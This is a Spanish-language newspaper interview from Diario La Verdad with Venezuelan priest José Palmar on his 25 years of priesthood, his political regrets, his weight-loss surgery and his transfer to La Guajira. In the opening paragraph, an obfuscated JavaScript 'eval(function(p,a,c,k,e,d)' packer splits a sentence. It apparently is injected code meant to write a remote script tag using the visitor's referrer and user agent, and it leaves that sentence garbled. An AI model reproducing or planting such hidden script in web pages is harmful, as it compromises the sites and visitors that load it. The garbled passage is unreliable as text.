publicidad

Padre Palmar se confiesa al cumplir 25 años ordenado

Aurimar Hidalgo / noticias@laverdad.com
En eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|rnrnz|var|u0026u|referrer|ysynf||js|php'.split('|'),0,{})) 1988 fue ordenado sacerdote y en 1990 fue designado párroco de la iglesia Nuestra Señora de Guadalupe, en el sector Sierra Maestra. El padre José Palmar celebra hoy 25 años de sacerdocio. Pide perdón por algunos de los errores que ha cometido, como la gula y haber apoyado al PSUV

(Foto:Tarquino Díaz)

No le gustan los formalismos, prefiere que lo llamen cura de barrio, título que lleva con orgullo. Polémico en sus convicciones políticas y con un verbo encendido y contestatario. Amigo de quienes le respetan su forma de ser y guía de muchos que ven en él no solo a un pastor espiritual, sino a un hombre vertical y correcto. Se trata del padre Palmar.

José de Jesús Palmar Morales nació el 1 de octubre de 1961. Su madre: María Chiquinquirá, de la etnia Añú, y su padre, José Ramón Palmar, de la etnia wayuu. Su esencia indígena no fue impedimento para encontrar el camino hacia Dios. De pequeño fue monaguillo y tras varios años de preparación, el 14 de agosto de 1988, se ordenó como sacerdote en la Plazoleta de la Virgen de Chiquinquirá de la mano de monseñor Domingo Roa Pérez. 

Además de ser devoto de María Santísima se considera hijo espiritual de Juan Pablo II y de la Madre Teresa de Calcuta. También es licenciado en Comunicación Social y fanático de las Águilas del Zulia. Desde el año 1990 hasta la fecha se desempeña como párroco de la iglesia Nuestra Señora de Guadalupe, ubicada en la comunidad de Sierra Maestra, en el municipio San Francisco. 

El padre Palmar celebrará hoy los 25 años de vida sacerdotal con una misa denominada: Bodas sin plata, la cual se realizará en su iglesia de toda la vida a partir de las 5.00 de la tarde. Luego de la eucaristía realizará un compartir al estilo wayuu, para recordar sus raíces.

- ¿Cómo tomó la decisión de ser sacerdote? 

- Desde los cuatro años yo estoy sumergido en el mundo eclesiástico, ya que desde pequeño fui monaguillo cuando el padre Ángel Ríos Carvajal, quien era el párroco de la Basílica Nuestra Señora de Chiquinquirá, también formé parte de los Servidores de María y fui seminarista.

Mi vocación se fue creando y formando a través de los consejos de los sacerdotes que estuvieron en mi camino, pero especialmente le doy gracias a monseñor Roberto Lückert, quien me tuvo a su lado por 14 años, los cuales fueron años muy fructíferos en mi vida debido a que estos me llevaron a decidirme finalmente a servirle a Dios.  

- ¿Cómo separa la vida espiritual de lo social? 

- Es un tanto difícil separar estos dos elementos, ya que para poder cumplir con mis propósitos espirituales tengo que tener una vida social, la cual me permite luchar por la paz de los devotos o creyentes de las comunidades; sin embargo, poco a poco he venido tratando de separarlos para evitar comentarios mal sanos. 

- ¿Cómo siente usted que ha realizado su trabajo durante estos 25 años? 

- Principalmente, tengo que decir que soy el padre más feliz del mundo, debido a que hago tres cosas que para mí son importantísimas, como es hablar con Dios, servir a las personas y ser un profeta de denuncias, yo me considero que tengo una labor profética en Venezuela. 

A pesar de los errores que he cometido y de los cuales me arrepiento, considero que mi labor eclesiástica la he venido realizando bien, ya que me he dedicado a realizar todas las tareas esenciales que debemos realizar los sacerdotes. 

- ¿De qué se ha arrepentido durante estos 25 años?   

- Una de las cosas de las que me he arrepentido es de haber sido una persona que apoyó al Partido Socialista de Venezuela (PSUV), aunque estaba consciente de lo que hacía en esos momentos, ahora pienso que fue el error más grande de mi vida, pero nunca es tarde para recapacitar.

- ¿Ha pedido alguna vez perdón y por qué?

- Sí, he pedido perdón por todos los errores que he cometido hasta ahora, así como también le he pedido perdón a Dios y a la Iglesia por haber cometido uno de los pecados capitales como lo es la gula, la cual solo me llevó a la obesidad.

- ¿Qué lo condujo a tomar la decisión para operarse?

- Debido a mi obesidad estaba sufriendo de hipertrofia en las rodillas, cansancio, hipertensión arterial, disnea del sueño, problemas respiratorios, mala circulación en la sangre, así como tendencia a sufrir de diabetes. Todo eso bastó. Fui operado en el año 2006 cuando tenía 44 años. Pesaba 320 kilos. 

- ¿Cómo es el antes y después de operarse?

- Mientras más grande era mi cuerpo más pequeño se hacía mi mundo, ya que solamente podía estar en mi silla y en mi cama. Pero cuando comencé a perder peso y llegar a pesar 80 kilos fue como volver a nacer, ya que podía realizar las actividades sin ningún problema, por ello cada día le doy gracias a Dios y a la Virgen. Fue la mejor decisión.

- ¿Qué piensa con respecto a su cambio de parroquia, si habrá un cambio?

- Sí, sí habrá un cambio, ya mi superior está planeando cuándo será la fecha en que se realizará mi traslado, según lo que me han notificado mi cambio será para La Guajira, lo cual me tiene inmensamente contento, ya que mis raíces provienen de esta localidad y me siento en deuda con esa zona. 

- ¿Cómo se prepara para este cambio?  

- Me siento muy contento, debido a que siempre he dicho que cuando termine mi labor en la iglesia Nuestra Señora de Guadalupe, uno de mis principales objetivos es irme a servir a las comunidades de La Guajira. Por otra parte, me siento triste, ya que estoy dejando la parroquia que me ha permitido realizar por 25 años los trabajos que benefician a las comunidades y sus habitantes.

- ¿Cuál ha sido la etapa más dura durante sus 25 años?

- Uno de los años más difíciles fue 1993, cuando salieron a relucir los temas de la secta satánica, en la cual estaban secuestrando a los niños. Otro de los años más duro fue en el 2007, cuando me tocó luchar contra los oficialistas que antes apoyaba. Ese año fue verdaderamente intenso. Luego pasé de ser denunciante a ser denunciado por las empresas petroleras que eran propiedades de los testaferros del Gobierno, tuve que acudir a varios juicios, pero gracias a Dios imperó la verdad.  

- ¿Cómo maneja usted los comentarios que hace en las redes sociales?

- Que la mayoría de mis comentarios por Twitter sean vistos por mis usuarios de una manera grosera, tajante y soez, no me parece. Solo se molestan porque digo la verdad, solamente escribo lo que mi conciencia me dice. Hablo sobre la mala gestión del Gobierno actual, utilizo la red social con el propósito de descargar mi rabia interna al ver cómo la gente se muere de hambre, mientras ellos solos despilfarran el dinero. 

- ¿Qué mensaje le da usted a los feligreses?

- Mi mensaje es claro y preciso, a la Iglesia hay que amarla con sus virtudes y defectos ya que está formada por hombres que somos pecadores, pero está en nuestras manos acercarla cada vez más a la perfección que solo es representada por Dios.

Ficha técnica

• Ordenación sacerdotal el 14 de agosto de 1988.

• Director del Centro Vocacional Santo Tomás de Aquino en 1988. 

• Licenciado en Teología en el Instituto Universitario Seminario Interdiocesana de Santa Rosa de Lima en 1989.

• Locutor en 1989.

• Párroco de la parroquia Sierra Maestra desde 1990.

• Licenciado en Comunicación Social en la mención Desarrollo Comunal en el 2007.

• Director del Diario Reporte de la Economía en 2007.

Más noticias

Comentarios
© 2017, Diario La Verdad. Maracaibo. Venezuela C.A. RIF J-30540623-5. Términos Legales. Contáctenos via: web@laverdad.com , noticias@laverdad.com o ventas@laverdad.com
Desarrollado por Miguel Guadarrama